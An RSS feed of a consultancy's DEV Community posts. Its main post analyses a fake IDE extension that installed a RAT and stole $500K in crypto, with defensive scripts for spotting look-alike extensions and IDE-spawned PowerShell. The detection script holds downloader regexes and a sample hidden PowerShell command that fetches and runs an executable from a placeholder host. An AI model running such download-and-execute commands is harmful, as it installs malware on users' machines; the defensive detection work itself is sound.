<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: CODECAVE</title>
    <description>The latest articles on DEV Community by CODECAVE (@codecave_pro).</description>
    <link>https://dev.to/codecave_pro</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2927564%2Fddbe7aad-1fa8-4bff-96cd-9bae8beac96f.png</url>
      <title>DEV Community: CODECAVE</title>
      <link>https://dev.to/codecave_pro</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/codecave_pro"/>
    <language>en</language>
    <item>
      <title>$500K was stolen through a fake IDE extension</title>
      <dc:creator>CODECAVE</dc:creator>
      <pubDate>Thu, 02 Oct 2025 11:00:40 +0000</pubDate>
      <link>https://dev.to/codecave_pro/500k-was-stolen-through-a-fake-ide-extension-no-0days-just-blind-trust-in-a-marketplace-3dmo</link>
      <guid>https://dev.to/codecave_pro/500k-was-stolen-through-a-fake-ide-extension-no-0days-just-blind-trust-in-a-marketplace-3dmo</guid>
      <description>&lt;p&gt;In July, $500K was stolen through a fake IDE extension. No 0days — just blind trust in a marketplace. Here’s why every fintech should care and what you can fix in 48 hours&lt;/p&gt;

&lt;p&gt;In July 2025, a fake “Solidity Language” plugin appeared on Open VSX, the extension registry that the Cursor IDE uses as its marketplace. Once installed, the extension executed malicious code, downloaded a backdoor, and let the attackers steal crypto assets. To make the fake plugin look trustworthy, the attackers manipulated search ranking and inflated its download count.&lt;/p&gt;

&lt;h2&gt;
  
  
  What exactly happened
&lt;/h2&gt;

&lt;p&gt;A blockchain developer installed the fake “Solidity Language” plugin from Open VSX into Cursor IDE. Its name matched the legitimate extension exactly.&lt;br&gt;
Inside the plugin, an extension.js file launched a PowerShell script that downloaded additional components: a RAT (Quasar) and a targeted stealer designed to locate and exfiltrate private keys and other secrets.&lt;br&gt;
 &lt;em&gt;Result:&lt;/em&gt; the attackers gained access to the victim's crypto assets, and about $500K was drained from the wallet.&lt;/p&gt;

&lt;h2&gt;
  
  
  Attack chain: how it worked
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Search spoofing &amp;amp; social engineering&lt;/em&gt;&lt;br&gt;
 The attackers uploaded a plugin with the same name and nearly identical metadata. They spoofed the author name (juanbIanco instead of juanblanco: a capital “I” in place of a lowercase “l”), and in Cursor’s UI font those two glyphs are visually indistinguishable, so users had no easy way to tell the fake apart. (&lt;a href="https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/" rel="noopener noreferrer"&gt;securelist.com&lt;/a&gt;)&lt;/p&gt;
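&lt;p&gt;The capital-I-for-lowercase-l trick is mechanical to catch if you compare extension identifiers by a confusable-folded “skeleton” rather than by eye. The script below is an added example written for this page (it is not code from the article, from Kaspersky, from Open VSX or from Cursor). It assumes extension ids have the form publisher.name, which is what code --list-extensions prints (Cursor ships the same CLI as cursor); the installed list, the allowlist and the look-alike table are constructed for the demo and mirror the juanbIanco / juanblanco pair above.&lt;/p&gt;

```python
"""Audit installed IDE extensions for publisher look-alikes and name collisions.

Added example by the editor; not code from the article, Open VSX or Cursor.
Extension ids are assumed to have the form publisher.name (what
`code --list-extensions` prints; Cursor exposes the same CLI as `cursor`).
The installed list and allowlist below are constructed for the demo and mirror
the juanbIanco / juanblanco pair from the article.
"""
import unicodedata

# Single characters that render alike in many UI fonts (illustrative, not exhaustive).
LOOKALIKES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})


def skeleton(identifier):
    """Collapse an identifier so that visually confusable spellings compare equal.

    NFKD plus dropping combining marks folds accented and compatibility forms;
    the translate() step maps capital I, digit 1 and pipe onto lowercase l, and
    zero onto o, before case folding (casefold alone would turn I into i).
    """
    text = unicodedata.normalize("NFKD", identifier)
    text = "".join(c for c in text if unicodedata.category(c) != "Mn")
    text = text.translate(LOOKALIKES).casefold()
    return text.replace("rn", "m").replace("vv", "w")


def audit(installed, allowlist):
    """Classify each installed extension id against an exact allowlist.

    Returns a list of (extension_id, verdict, matched_allowlisted_id):
      allowed       exact match
      impersonates  not allowlisted, but confusable with an allowlisted id
      same-name     same extension name under a different publisher
      unknown       not allowlisted and unrelated to anything approved
    """
    allowed = set(allowlist)
    by_skeleton = {}
    by_name = {}
    for ext in allowlist:
        by_skeleton.setdefault(skeleton(ext), []).append(ext)
        by_name.setdefault(skeleton(ext.split(".", 1)[-1]), []).append(ext)
    results = []
    for ext in installed:
        if ext in allowed:
            results.append((ext, "allowed", ext))
            continue
        twins = by_skeleton.get(skeleton(ext))
        if twins:
            results.append((ext, "impersonates", twins[0]))
            continue
        name_twins = by_name.get(skeleton(ext.split(".", 1)[-1]))
        if name_twins:
            results.append((ext, "same-name", name_twins[0]))
            continue
        results.append((ext, "unknown", None))
    return results


# Constructed sample input (not real marketplace data).
ALLOWLIST = ["juanblanco.solidity", "ms-python.python", "rust-lang.rust-analyzer"]
INSTALLED = [
    "juanblanco.solidity",     # the approved one
    "juanbIanco.solidity",     # capital I replaces lowercase l, as in the article
    "someone.solidity",        # same display name, unrelated publisher
    "ms-python.python",
    "acme.internal-tools",     # not approved at all
]

if __name__ == "__main__":
    for ext, verdict, match in audit(INSTALLED, ALLOWLIST):
        suffix = f"  (vs {match})" if match and match != ext else ""
        print(f"{verdict:13} {ext}{suffix}")
```

&lt;p&gt;Run it against the real output of the extension CLI and treat anything other than “allowed” as a ticket, not a warning. The skeleton step is deliberately lossy: it also folds “rn” to “m” and “vv” to “w”, so a publisher such as rns-python collides with ms-python. That is what you want in an allowlist check, where a false alarm costs a minute and a miss costs a wallet.&lt;/p&gt;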

&lt;p&gt;&lt;em&gt;Ranking manipulation&lt;/em&gt;&lt;br&gt;
 Fake download activity boosted the malicious extension above the real one in search results.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Malicious execution&lt;/em&gt;&lt;br&gt;
 Once installed, the plugin executed extension.js, launched a PowerShell script, downloaded Quasar RAT and a stealer, and deployed additional modules.&lt;/p&gt;
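&lt;p&gt;The step above is the one an endpoint sensor can see: an IDE process spawning PowerShell with a download cradle on its command line. The triage script below is an added example written for this page (not code from the article, from Kaspersky, from Cursor or from Sysmon). The events are constructed inline in a simplified Sysmon Event ID 1 shape; in production they would come from your EDR or SIEM. Two things it assumes, which you should verify on your own build, are that VS Code-family editors run extensions in a child process whose command line contains --type=extensionHost, and that the integrated terminal's shell is spawned by the pty host (--type=ptyHost). The indicator regexes are illustrative heuristics, not vendor rules.&lt;/p&gt;

```python
"""Triage process-creation events for an IDE launching PowerShell, the step the
article calls 'Malicious execution'.

Added example by the editor; not code from the article, Kaspersky, Cursor or
Sysmon. Events are constructed inline in a simplified Sysmon Event ID 1 shape
(UtcTime, Image, ParentImage, CommandLine, ParentCommandLine); in production
they would come from your EDR or SIEM. Two assumptions to verify on your own
build: VS Code-family editors run extensions in a child process whose command
line contains --type=extensionHost, and the integrated terminal's shell is
spawned by the pty host (--type=ptyHost). The indicator regexes are
illustrative heuristics, not vendor detection rules.
"""
import re

IDE_IMAGES = {"cursor.exe", "code.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line traits of a typical first-stage downloader.
INDICATORS = [
    ("download_cradle", re.compile(
        r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|"
        r"\biex\b|start-bitstransfer|\bcurl\b|\bwget\b", re.I)),
    ("encoded_command", re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("policy_bypass", re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("drops_to_temp", re.compile(r"\$env:temp|%temp%|\\temp\\", re.I)),
]


def basename(path):
    """Last path component, lower-cased, for both Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event):
    """Return (severity, reasons) for one process-creation event.

    high    an IDE spawned a shell whose command line carries downloader or
            evasion traits (this is the article's attack chain)
    medium  an IDE spawned a shell with no further indicator; review it
    low     same, but the parent is the pty host, i.e. most likely a developer
            typing in the integrated terminal
    none    not an IDE-to-shell event at all
    """
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in IDE_IMAGES or child not in SHELLS:
        return "none", []
    reasons = ["ide_spawned_shell"]
    parent_cmd = event.get("ParentCommandLine", "")
    if "--type=extensionHost" in parent_cmd:
        reasons.append("from_extension_host")
    command = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS if rx.search(command)]
    reasons.extend(hits)
    if hits:
        return "high", reasons
    if "--type=ptyHost" in parent_cmd:
        return "low", reasons
    return "medium", reasons


def triage(events):
    """Return [(UtcTime, severity, reasons)] for every event that is not 'none'."""
    findings = []
    for event in events:
        severity, reasons = evaluate(event)
        if severity != "none":
            findings.append((event["UtcTime"], severity, reasons))
    return findings


# Constructed sample events (not real telemetry).
CURSOR = r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"UtcTime": "2025-07-10 09:12:01", "Image": CURSOR,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "Cursor.exe", "ParentCommandLine": "explorer.exe"},
    {"UtcTime": "2025-07-10 09:12:07", "Image": PS, "ParentImage": CURSOR,
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
                    "-Command \"iwr https://example.invalid/stage2 -OutFile $env:TEMP\\s.exe; "
                    "Start-Process $env:TEMP\\s.exe\"",
     "ParentCommandLine": "Cursor.exe --type=extensionHost"},
    {"UtcTime": "2025-07-10 09:13:40", "Image": PS, "ParentImage": CURSOR,
     "CommandLine": "powershell.exe", "ParentCommandLine": "Cursor.exe --type=ptyHost"},
]

if __name__ == "__main__":
    for when, severity, reasons in triage(EVENTS):
        print(when, severity.upper(), ", ".join(reasons))
```

&lt;p&gt;The parent command line is what separates “an extension did this” from “a developer typed this in the terminal”; without it, an IDE-spawns-PowerShell rule fires on every integrated-terminal session and gets tuned into silence. Also log the child's own children: in the article's chain the PowerShell stage drops and starts the RAT, so the second hop (powershell.exe starting an executable out of %TEMP%) is a second, independent detection point.&lt;/p&gt;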

&lt;p&gt;&lt;em&gt;Environment exploitation&lt;/em&gt;&lt;br&gt;
 Because the developer kept wallet private keys and project secrets on the same machine as the IDE, the stealer could collect them and the attackers moved the funds.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this matters to CTOs, CEOs and dev teams in fintech/crypto
&lt;/h2&gt;

&lt;p&gt;Open VSX does not put extensions through a mandatory security review before they are published, which is how a lookalike like this goes live and stays listed long enough to find victims.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;What to do:&lt;/em&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;em&gt;Don't rely on names or download counts.&lt;/em&gt; Attackers mimic legitimacy with metadata and ranking manipulation.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Restrict extension privileges.&lt;/em&gt; Block or sandbox extensions that can run arbitrary code or scripts without explicit approval. Note that VS Code-family editors have no per-extension permission model: every extension runs with the user's full privileges in the extension host, so in practice this means controlling which extensions may be installed at all (VS Code's extensions.allowed setting can enforce an allowlist centrally).&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Never store keys or seed phrases in IDE environments.&lt;/em&gt; Use hardware wallets, secure VMs or enclaves, and keep production secrets off developer machines.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Create a company-wide extension policy.&lt;/em&gt; Maintain centralized allowlists and blocklists, and only permit installs from an internal catalog.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Enable monitoring and EDR.&lt;/em&gt; Track PowerShell execution, unusual network behaviour and scripts launched by extensions.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Secure CI/CD and dependencies.&lt;/em&gt; Use SCA scanners, version pinning, checksum validation and other supply-chain controls.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  And there’s another trend making this worse: AI-driven development
&lt;/h2&gt;

&lt;p&gt;Apiiro analyzed tens of thousands of repositories written by developers at Fortune 50-related companies. Key findings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AI assistants reduce syntax errors by 76% and logic mistakes by 60%.
&lt;/li&gt;
&lt;li&gt;But AI-generated code also contains 322% more vulnerabilities that enable privilege escalation and 153% more architectural security flaws.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;AI fixes typos — but also unknowingly inserts ticking time bombs. With faster code output and wider use of helper tools like Cursor, the number of hidden vulnerabilities and risky extensions will only grow.&lt;br&gt;
 This incident is a clear example of how supply chain trust and developer tooling choices translate directly into financial losses and reputation damage. For crypto, fintech and SaaS companies, this is a signal to act systemically: DevSecOps + supply-chain control + extension/security governance.&lt;/p&gt;

&lt;h3&gt;
  
  
  We provide services around Azure, Proxmox, secure VM templates and CI/CD hardening. Check the DevOps section on &lt;a href="https://www.codecave.it/#contact-form" rel="noopener noreferrer"&gt;our website&lt;/a&gt; if you'd like help implementing safeguards.
&lt;/h3&gt;

&lt;p&gt;Can your developers install plugins and extensions without any approval — or have you already locked this down?&lt;/p&gt;

</description>
      <category>ai</category>
      <category>devops</category>
      <category>cursorai</category>
      <category>vscode</category>
    </item>
    <item>
      <title>Proxmox VM Templates and Cloud-Init</title>
      <dc:creator>CODECAVE</dc:creator>
      <pubDate>Tue, 23 Sep 2025 07:59:52 +0000</pubDate>
      <link>https://dev.to/codecave_pro/proxmox-vm-templates-and-cloud-init-1364</link>
      <guid>https://dev.to/codecave_pro/proxmox-vm-templates-and-cloud-init-1364</guid>
      <description>&lt;p&gt;Proxmox and Cloud-Init virtual machine templates&lt;br&gt;
In the world of virtualization, efficiency and automation are key. This is where Proxmox Virtual Environment (VE) comes into play, offering a robust solution for easily managing virtual machines (VMs). One of the most useful features of Proxmox is the ability to combine VM templates with Cloud-Init, which simplifies deployment and makes it as smooth as in the cloud. Let's figure it out.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is Proxmox?
&lt;/h2&gt;

&lt;p&gt;Proxmox is a free and open source virtualization platform, which means anyone can use or modify it at no cost. Think of it as a set of tools for creating multiple isolated computers (virtual machines) on a single physical machine. Those VMs can run different operating systems side by side, such as Windows or Linux, which makes them useful for testing, development, or even production environments.&lt;/p&gt;

&lt;p&gt;Proxmox is the manager of these virtual environments. It uses KVM (Kernel-based Virtual Machine), the Linux kernel's own hypervisor, which gives every virtual machine hardware-assisted isolation so that one VM cannot interfere with another. In addition, Proxmox can run containers via LXC (Linux Containers), which are even lighter than VMs and well suited to running individual applications with minimal overhead; keep in mind that a container shares the host kernel and therefore offers weaker isolation than a VM.&lt;/p&gt;

&lt;p&gt;You can also manage your VMs and containers from a browser: the web-based interface is designed to be user-friendly, so even people new to virtualization can get started without much trouble.&lt;/p&gt;

&lt;h2&gt;
  
  
  What are Proxmox VM Templates?
&lt;/h2&gt;

&lt;p&gt;Proxmox VM templates are essentially pre-configured VMs that serve as blueprints for creating new instances. They include the operating system, installed software, and system configurations. The beauty of templates is that they save time and ensure consistency across deployments. You can quickly spin up new VMs without going through the entire installation and configuration process each time.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Role of Cloud-Init
&lt;/h2&gt;

&lt;p&gt;Cloud-Init is a versatile package that supports various distributions and handles the initial setup of a VM instance, such as network configuration and SSH key distribution. When a VM boots for the first time, Cloud-Init applies the predefined settings, allowing for a hands-off approach to VM provisioning (&lt;a href="https://pve.proxmox.com/wiki/Cloud-Init_Support" rel="noopener noreferrer"&gt;https://pve.proxmox.com/wiki/Cloud-Init_Support&lt;/a&gt;).&lt;/p&gt;

&lt;h2&gt;
  
  
  Combining Proxmox Templates with Cloud-Init
&lt;/h2&gt;

&lt;p&gt;Integrating Cloud-Init with Proxmox VM templates brings the best of both worlds. Here's how you can leverage this combination to your advantage:&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Preparing Your Template
&lt;/h3&gt;

&lt;p&gt;Start by preparing your VM with the desired configuration. Install the operating system and all necessary packages, including Cloud-Init. Before you convert the VM, clear the state that must be unique per clone, in particular /etc/machine-id and the SSH host keys, so that every clone does not share one identity (Cloud-Init regenerates the host keys on first boot when they are absent). Once your VM is ready, convert it into a template to serve as the foundation for future VMs.&lt;/p&gt;

&lt;p&gt;Read the full article: &lt;a href="https://bit.ly/47WX1Ce" rel="noopener noreferrer"&gt;https://bit.ly/47WX1Ce&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>vm</category>
      <category>proxmox</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Black Friday will test your infrastructure. Will it pass?</title>
      <dc:creator>CODECAVE</dc:creator>
      <pubDate>Fri, 19 Sep 2025 09:45:54 +0000</pubDate>
      <link>https://dev.to/codecave_pro/black-friday-will-test-your-infrastructure-will-it-pass-2cfe</link>
      <guid>https://dev.to/codecave_pro/black-friday-will-test-your-infrastructure-will-it-pass-2cfe</guid>
      <description>&lt;p&gt;We've compiled a BINGO of the most common infrastructure challenges based on real conversations with our clients. &lt;br&gt;
 No scaling → downtime risks&lt;br&gt;
 No stress tests → surprises on peak days&lt;br&gt;
 No dashboards → zero visibility into system health&lt;br&gt;
 Weak security → potential breaches&lt;/p&gt;

&lt;p&gt;How many boxes would your company tick?&lt;/p&gt;

&lt;p&gt;📌 Not sure if your infrastructure can handle the next traffic spike?&lt;br&gt;
 Let’s jump on &lt;a href="https://bit.ly/4pvguQH" rel="noopener noreferrer"&gt;a free call&lt;/a&gt; — we’ll help you spot weak points before your customers do.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbo5mtszt7c8cmipit9e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvbo5mtszt7c8cmipit9e.png" alt=" " width="800" height="999"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;original source: &lt;a href="https://lnkd.in/p/drXGKZHX" rel="noopener noreferrer"&gt;https://lnkd.in/p/drXGKZHX&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>devchallenge</category>
      <category>infrastructureascode</category>
      <category>monitoring</category>
    </item>
    <item>
      <title>Are you a CTO, CEO, or eCommerce manager drowning in 100+ SKUs and endless product configurations?</title>
      <dc:creator>CODECAVE</dc:creator>
      <pubDate>Tue, 16 Sep 2025 06:18:41 +0000</pubDate>
      <link>https://dev.to/codecave_pro/are-you-a-cto-ceo-or-ecommerce-manager-drowning-in-100-skus-and-endless-product-configurations-3k5b</link>
      <guid>https://dev.to/codecave_pro/are-you-a-cto-ceo-or-ecommerce-manager-drowning-in-100-skus-and-endless-product-configurations-3k5b</guid>
      <description>&lt;p&gt;3D catalogs and AR product previews are becoming a real tool to speed up configuration and improve buyer confidence.&lt;br&gt;
We broke it all down in the article — with real examples from Nike, IKEA, and L’Occitane.&lt;/p&gt;

&lt;p&gt;Learn what a 3D product catalog is, why it matters in modern e-commerce, and how companies are using it to improve engagement and conversions – especially when traditional catalogs fall short.&lt;/p&gt;

&lt;p&gt;Read the article: &lt;a href="https://lnkd.in/e5krN9zd" rel="noopener noreferrer"&gt;https://lnkd.in/e5krN9zd&lt;/a&gt;&lt;/p&gt;

</description>
      <category>catalog</category>
      <category>ecommerce</category>
      <category>product</category>
      <category>ar</category>
    </item>
  </channel>
</rss>
